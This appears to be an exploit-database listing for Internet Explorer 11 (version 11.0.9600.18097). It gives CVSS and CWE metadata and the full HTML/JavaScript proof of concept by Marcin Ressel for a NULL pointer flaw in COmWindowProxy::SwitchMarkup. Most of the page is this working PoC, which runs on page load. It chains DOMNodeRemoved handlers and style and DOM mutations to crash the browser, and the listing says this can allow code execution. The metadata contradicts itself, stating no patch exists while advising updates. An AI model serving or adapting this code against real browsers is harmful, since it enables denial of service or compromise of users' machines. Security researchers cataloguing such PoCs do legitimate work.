header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Marcin Ressel
9.8
CVSS
CRITICAL
COmWindowProxy::SwitchMarkup NULL PTR
CWE
Product Name: Internet Explorer
Affected Version From: 11.0.9600.18097
Affected Version To: 11.0.9600.18097
Patch Exists: NO
Related CWE:
CPE: a:microsoft:ie:11.0.9600.18097
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64
2015

IE11 11.0.9600.18097 NULL PTR

Exploit allows an attacker to execute arbitrary code or cause a denial-of-service condition.

Mitigation:

Apply the latest security updates from Microsoft to fix this vulnerability.
Source

Exploit-DB raw data:

<!doctype html>
<html>
	<head>
		<meta http-equiv='Cache-Control' content='no-cache'/>
		<title>IE11 11.0.9600.18097 NULL PTR</title>
		<script>
    
      /*
       * Exploit Title: IE 11 COmWindowProxy::SwitchMarkup NULL PTR
       * Date: 09.12.2015
       * Exploit Author: Marcin Ressel 
       * Vendor Homepage: www.microsoft.com
       * Software Link: 0
       * Version: 11.0.9600.18097
       * Tested on: Windows 7 x64 
       * https://twitter.com/m_ressel
      */
      var trg,src,arg;

			function tk() {

                targetDomTree = document.getElementsByTagName("*");
		
                var meta = document.createElement('meta');
                    meta.setAttribute("http-equiv", "X-UA-Compatible");
                    meta.setAttribute("content",'IE=10');
            
                document.getElementsByTagName("head")[0].appendChild(meta);
               
                doc = document;
                
                src = targetDomTree[8]; 
				        trg = targetDomTree[1]; 
				        arg = targetDomTree[0];  
        
				        arg.addEventListener("DOMNodeRemoved",new Function("",
                                                                   'try{src.runtimeStyle.textAlignLast="center";}catch(err){}'+
                                                                   'try{trg = arg.removeNode(true);}catch(err){}'+
                                                                   'try{trg.parentNode.style.textAutospace="ideograph-numeric";}catch(err){}'+
                                                                   'try{trg.runtimeStyle="align-items:stretch;";}catch(err){}'+
                                                                   'try{trg.insertAdjacentHTML("afterEnd","<table><tfoot>http://www.w3.org/2000/xmlns/</tfoot></table>");}catch(err){}'+
                                                                   'try{trg.parentElement.parentNode.style.wordWrap="initial";}catch(err){}'+
                                                                   'try{trg.parentNode.style.writingMode="vertical-rl";}catch(err){}'+
                                                                   'try{doc.write("");}catch(err){}try{trg.style.whiteSpace="pre"; }catch(err){}'
                                                                  ),
                                                                  true); 

				        trg.outerText = new Object(); 
				        trg.parentNode.appendChild(document.createElement("div")); 
			}
		</script>
	</head>
	<body onload='tk();'>
	<div id="out">..</div>
  <div id="oneUnArg">...</div>
  <div id="pHolder"></div>	
	</body>
</html>

Navigation

Suggest Exploit

Services By CQR